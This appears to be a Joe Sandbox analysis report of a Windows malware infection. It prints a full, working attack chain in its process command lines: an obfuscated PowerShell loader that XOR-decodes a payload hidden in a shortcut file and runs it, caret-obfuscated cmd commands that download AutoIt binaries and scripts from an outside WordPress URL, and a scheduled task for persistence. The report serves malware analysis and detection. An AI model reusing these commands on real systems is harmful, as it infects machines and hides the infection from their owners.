"c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
                          Imagebase:0x7ff660490000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:2
                          Start time:03:02:08
                          Start date:24/04/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff620390000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:3
                          Start time:03:02:08
                          Start date:24/04/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
                          Imagebase:0x7ff7b2bb0000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000003.00000002.1383867622.000001EFF7AE0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:03:02:10
                          Start date:24/04/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
                          Imagebase:0x7ff660490000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:5
                          Start time:03:02:10
                          Start date:24/04/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff620390000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:6
                          Start time:03:02:10
                          Start date:24/04/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
                          Imagebase:0x7ff7b2bb0000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:7
                          Start time:03:02:18
                          Start date:24/04/2024
                          Path:C:\Windows\System32\attrib.exe
                          Wow64 process (32bit):false
                          Commandline:attrib +h c:\GSlLzFnTov
                          Imagebase:0x7ff701440000
                          File size:23'040 bytes
                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:8
                          Start time:03:02:18
                          Start date:24/04/2024
                          Path:C:\GSlLzFnTov\GSlLzFnTov.exe
                          Wow64 process (32bit):false
                          Commandline:GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
                          Imagebase:0x7ff7f1d90000
                          File size:530'944 bytes
                          MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 0%, ReversingLabs
                          • Detection: 0%, Virustotal, Browse
                          Reputation:moderate
                          Has exited:true

                          Target ID:9
                          Start time:03:02:20
                          Start date:24/04/2024
                          Path:C:\GSlLzFnTov\GSlLzFnTov.exe
                          Wow64 process (32bit):false
                          Commandline:GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
                          Imagebase:0x7ff7f1d90000
                          File size:530'944 bytes
                          MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:10
                          Start time:03:02:24
                          Start date:24/04/2024
                          Path:C:\Windows\System32\schtasks.exe
                          Wow64 process (32bit):false
                          Commandline:schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
                          Imagebase:0x7ff6a6ed0000
                          File size:235'008 bytes
                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:11
                          Start time:03:02:25
                          Start date:24/04/2024
                          Path:C:\Windows\System32\attrib.exe
                          Wow64 process (32bit):false
                          Commandline:attrib +h c:\GSlLzFnTov
                          Imagebase:0x7ff701440000
                          File size:23'040 bytes
                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:12
                          Start time:03:02:25
                          Start date:24/04/2024
                          Path:C:\GSlLzFnTov\GSlLzFnTov.exe
                          Wow64 process (32bit):false
                          Commandline:GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
                          Imagebase:0x7ff700e40000
                          File size:530'944 bytes
                          MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:14
                          Start time:03:02:27
                          Start date:24/04/2024
                          Path:C:\GSlLzFnTov\GSlLzFnTov.exe
                          Wow64 process (32bit):false
                          Commandline:GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
                          Imagebase:0x7ff700e40000
                          File size:530'944 bytes
                          MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:15
                          Start time:03:02:29
                          Start date:24/04/2024
                          Path:C:\Windows\System32\schtasks.exe
                          Wow64 process (32bit):false
                          Commandline:schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
                          Imagebase:0x7ff6a6ed0000
                          File size:235'008 bytes
                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:false

                          Reset < >
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: x6{$x6{
                            • API String ID: 0-4022085565
                            • Opcode ID: ce3ab4001bfc95e76bc512c21133e0235a6588eac81dff1f215e97b2447b21ba
                            • Instruction ID: ede0f691820dcf86b3dcfa16d371b7d2eb317653132d06f33ebb76d444d4cbdb
                            • Opcode Fuzzy Hash: ce3ab4001bfc95e76bc512c21133e0235a6588eac81dff1f215e97b2447b21ba
                            • Instruction Fuzzy Hash: E6F18E3191DB895FE70ABB3898565B57BE0EF03234B4802FED48DC71E3E959A806C361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: C_H
                            • API String ID: 0-480754390
                            • Opcode ID: b645dad9131307d43d786b2b43e2c6a0d6cddc42ffc28298b87b8e8b90310a95
                            • Instruction ID: 84c5b9de064fd739a9999e0d64b83dc7e9417f647e8ea6e6493ec056a241de41
                            • Opcode Fuzzy Hash: b645dad9131307d43d786b2b43e2c6a0d6cddc42ffc28298b87b8e8b90310a95
                            • Instruction Fuzzy Hash: A3D1443191CA894FD795EF2898546A4BBE1FF5A324B4802FFD44DC7193DA28AC06C791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: C_H
                            • API String ID: 0-480754390
                            • Opcode ID: 8ada73d076385e51203b0960dc534a5e962b7b3136d1ad928eab7d39ee87098f
                            • Instruction ID: 1cb352e62144d27ace111b8fe30017cbdfed6b588b7d2ac8e11bda6942198908
                            • Opcode Fuzzy Hash: 8ada73d076385e51203b0960dc534a5e962b7b3136d1ad928eab7d39ee87098f
                            • Instruction Fuzzy Hash: 0BB1043191DAC54FD396EF3888542A4BFE1EF5A224B4901FFD48DCB1A3DA58AC0AC751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 74c2749e8d5186af386360744844a33c625d70ff43a13a3c2d11d02caeae8d88
                            • Instruction ID: 9c85fc47e9d9c03ed6022ad818081111463d731cceb564476f0212aefb1d18d1
                            • Opcode Fuzzy Hash: 74c2749e8d5186af386360744844a33c625d70ff43a13a3c2d11d02caeae8d88
                            • Instruction Fuzzy Hash: C252E231A1DA898FEB98FF288854A64B7E1FF95314B9401BDC00ECB683DE25AC45C752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 92a4756ce06d8a45ec105df1d290ca55489a412e7622f6098bc18d17d037a46c
                            • Instruction ID: 667211de5fb43b6a713cd58ad87f83226286b64382a52de37dd29761770d5ece
                            • Opcode Fuzzy Hash: 92a4756ce06d8a45ec105df1d290ca55489a412e7622f6098bc18d17d037a46c
                            • Instruction Fuzzy Hash: B0C12531A1DA8A4FD799EF2898646B4BBE1FF56324B8801BED40DC71D3DE189C05C355
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bb4cb58dce58f39f49514c81d2815ed75f2c8ada9ddd323f168f41b722eb59c0
                            • Instruction ID: 571454cfa48dc5363dcde37b4b59840feef8c461a47624409dec4f5cfcf53764
                            • Opcode Fuzzy Hash: bb4cb58dce58f39f49514c81d2815ed75f2c8ada9ddd323f168f41b722eb59c0
                            • Instruction Fuzzy Hash: A1615672E1DA894FE795FB2C58196B5BBE1EF46224B4841BFC40DCB293DD48AC02C391
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5ba3c3b794a73522ea9c379c56c4ec68dbb78c942450eb2a3037b2618d05949c
                            • Instruction ID: f949b44ffc75609a1e89537570f03b0201876a1fff9858958235b7c85034d39a
                            • Opcode Fuzzy Hash: 5ba3c3b794a73522ea9c379c56c4ec68dbb78c942450eb2a3037b2618d05949c
                            • Instruction Fuzzy Hash: A1310A71E2D98A4FE758BB2C54606B8B2E1FF48768FD4027DE80ED32C3DE18A8044255
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b8a4643b1fa7084ff38a98b83c77c7dd0eb58b04e6d53d5ab442c0c81c00fc7d
                            • Instruction ID: 565de1ea01412d9cdf2f8a82af3ff56722e7cf45e7459de709322c5ef84c426a
                            • Opcode Fuzzy Hash: b8a4643b1fa7084ff38a98b83c77c7dd0eb58b04e6d53d5ab442c0c81c00fc7d
                            • Instruction Fuzzy Hash: 0811E932E3DD06CBBB98B92C6551179A3E1FF44234FD8017DE40EC3586DD496C110571
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.1389201015.00007FF7C13D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C13D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff7c13d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 702e827c8fa1aab154412f7f0d8e9aa9583817ffda438e5549e58a0f1ecc2512
                            • Instruction ID: 049624e6d79379640a2750dd8c52eef04dee00f10e76e1f056167c3695a6ca33
                            • Opcode Fuzzy Hash: 702e827c8fa1aab154412f7f0d8e9aa9583817ffda438e5549e58a0f1ecc2512
                            • Instruction Fuzzy Hash: 5B01D472F1E90A4FE798FA1C1554578A2C2EF8823579840BED40EC7396DD49EC004350
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.1387065060.00007FF7C1300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1300000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ff7c1300000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5da2c6b30f459f635ce5dc462c2373d4b27d0aa50ea3d8b2107ca56167582fe6
                            • Instruction ID: 092f8a8f7d7aff4f0ee4d527a4556aaf73a2813d153e8814bee2a16a6b4de583
                            • Opcode Fuzzy Hash: 5da2c6b30f459f635ce5dc462c2373d4b27d0aa50ea3d8b2107ca56167582fe6
                            • Instruction Fuzzy Hash: E101677111CB0C4FD744EF0CE491AA5B7E0FB99364F50056EE58AC7651DB36E881CB45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:8.7%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:22.1%
                            Total number of Nodes:1950
                            Total number of Limit Nodes:41
                            execution_graph 34584 7ff7f1dcd300 9 API calls __swprintf_l 34585 7ff7f1dc8700 21 API calls __swprintf_l 34589 7ff7f1ddf310 CryptAcquireContextA CryptGenRandom CryptReleaseContext 34591 7ff7f1deb710 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter __security_init_cookie 34594 7ff7f1ddf4e0 7 API calls 34596 7ff7f1ddeee0 158 API calls 34597 7ff7f1dd64e0 411 API calls 34598 7ff7f1dec4e0 free 34602 7ff7f1db22f0 35 API calls __swprintf_l 34603 7ff7f1ddf2f0 15 API calls __swprintf_l 34605 7ff7f1d9b2ee 30 API calls __swprintf_l 34609 7ff7f1deb6ba _exit GetModuleHandleW __scrt_is_managed_app 34464 7ff7f1d91ed0 34465 7ff7f1d91eff 34464->34465 34466 7ff7f1da5718 GetEnvironmentVariableA 34465->34466 34467 7ff7f1d91f19 34466->34467 34468 7ff7f1d91f21 strtol 34467->34468 34474 7ff7f1d91f3e 34467->34474 34468->34474 34469 7ff7f1d91f78 GetStdHandle 34470 7ff7f1d91f9b 34469->34470 34471 7ff7f1d91f89 GetConsoleScreenBufferInfo 34469->34471 34472 7ff7f1deaf80 __swprintf_l 8 API calls 34470->34472 34471->34470 34473 7ff7f1d91ff5 34472->34473 34474->34469 34474->34470 34475 7ff7f1d9a2d4 __acrt_iob_func malloc 34476 7ff7f1d9a3cf 34475->34476 34477 7ff7f1d9a321 34475->34477 34485 7ff7f1d9a80c 19 API calls 34476->34485 34479 7ff7f1da5148 31 API calls 34477->34479 34480 7ff7f1d9a326 34479->34480 34482 7ff7f1d9a33b 34480->34482 34484 7ff7f1d9a80c 19 API calls 34480->34484 34483 7ff7f1d9a3c3 free 34483->34482 34484->34483 34485->34482 34612 7ff7f1ddbed0 47 API calls 34613 7ff7f1dd06d0 71 API calls 34615 7ff7f1d93ac8 27 API calls 34616 7ff7f1d9fccc calloc 34619 7ff7f1d9b6c9 99 API calls __swprintf_l 34621 7ff7f1debaa0 11 API calls 34622 7ff7f1deb4a0 11 API calls 2 library calls 34626 7ff7f1d920b0 _lseeki64 34629 7ff7f1dd14b0 178 API calls __swprintf_l 34630 7ff7f1dd24b0 strtol 34635 7ff7f1de6880 7 API calls 34379 7ff7f1d9f67b _strdup 34380 7ff7f1d9f68b setlocale 34379->34380 34381 7ff7f1d9f69f 34380->34381 34388 7ff7f1d9f6be 34380->34388 34382 7ff7f1d9f70f 34381->34382 34383 7ff7f1d9f6a4 strncmp 34381->34383 34437 7ff7f1d9990c 22 API calls 34382->34437 34387 7ff7f1d9f702 free 34383->34387 34383->34388 34390 7ff7f1d9f70b 34387->34390 34388->34387 34410 7ff7f1da0658 34388->34410 34389 7ff7f1d9f6f8 34389->34387 34389->34390 34390->34382 34392 7ff7f1d9f734 34390->34392 34391 7ff7f1d9f71c 34394 7ff7f1d9f74f 34391->34394 34395 7ff7f1d9f72b 34391->34395 34394->34392 34397 7ff7f1d9f760 34394->34397 34398 7ff7f1d9f759 34394->34398 34438 7ff7f1d99d3c 20 API calls 34395->34438 34400 7ff7f1d9f75e 34397->34400 34401 7ff7f1da51f8 37 API calls 34397->34401 34439 7ff7f1d99e74 20 API calls __swprintf_l 34398->34439 34400->34392 34402 7ff7f1d9f76e 34401->34402 34403 7ff7f1da5370 16 API calls 34402->34403 34404 7ff7f1d9f788 puts 34403->34404 34405 7ff7f1d9f79f 34404->34405 34406 7ff7f1d9f7c3 puts 34404->34406 34408 7ff7f1d9f7c1 34405->34408 34440 7ff7f1da50d8 16 API calls __swprintf_l 34405->34440 34406->34408 34408->34392 34409 7ff7f1db67dc 124 API calls 34408->34409 34409->34400 34411 7ff7f1da068e 34410->34411 34412 7ff7f1da070d 34410->34412 34441 7ff7f1d93cd4 34411->34441 34413 7ff7f1da0720 fopen 34412->34413 34415 7ff7f1da0716 __acrt_iob_func 34412->34415 34431 7ff7f1da06ce 34413->34431 34415->34431 34417 7ff7f1da06d3 34454 7ff7f1da0590 17 API calls __swprintf_l 34417->34454 34418 7ff7f1da06a5 fopen 34419 7ff7f1da06bd free 34418->34419 34418->34431 34423 7ff7f1d9f6db 34419->34423 34423->34389 34436 7ff7f1d9a7ac 16 API calls __swprintf_l 34423->34436 34424 7ff7f1da06e3 34432 7ff7f1da06fb 34424->34432 34455 7ff7f1da0590 17 API calls __swprintf_l 34424->34455 34426 7ff7f1da0b7c free __acrt_iob_func 34427 7ff7f1da0b92 fclose 34426->34427 34428 7ff7f1da0b9b free 34426->34428 34427->34428 34428->34423 34429 7ff7f1da0b74 34429->34426 34430 7ff7f1da08a1 malloc 34430->34429 34430->34432 34431->34426 34431->34428 34431->34429 34431->34430 34433 7ff7f1da0b56 free 34431->34433 34434 7ff7f1da0a31 malloc 34431->34434 34435 7ff7f1d9a780 19 API calls 34431->34435 34447 7ff7f1da0bc8 34431->34447 34432->34428 34432->34431 34433->34431 34434->34432 34435->34431 34436->34389 34437->34391 34439->34400 34440->34405 34443 7ff7f1d93d02 34441->34443 34446 7ff7f1d93e1e 34441->34446 34442 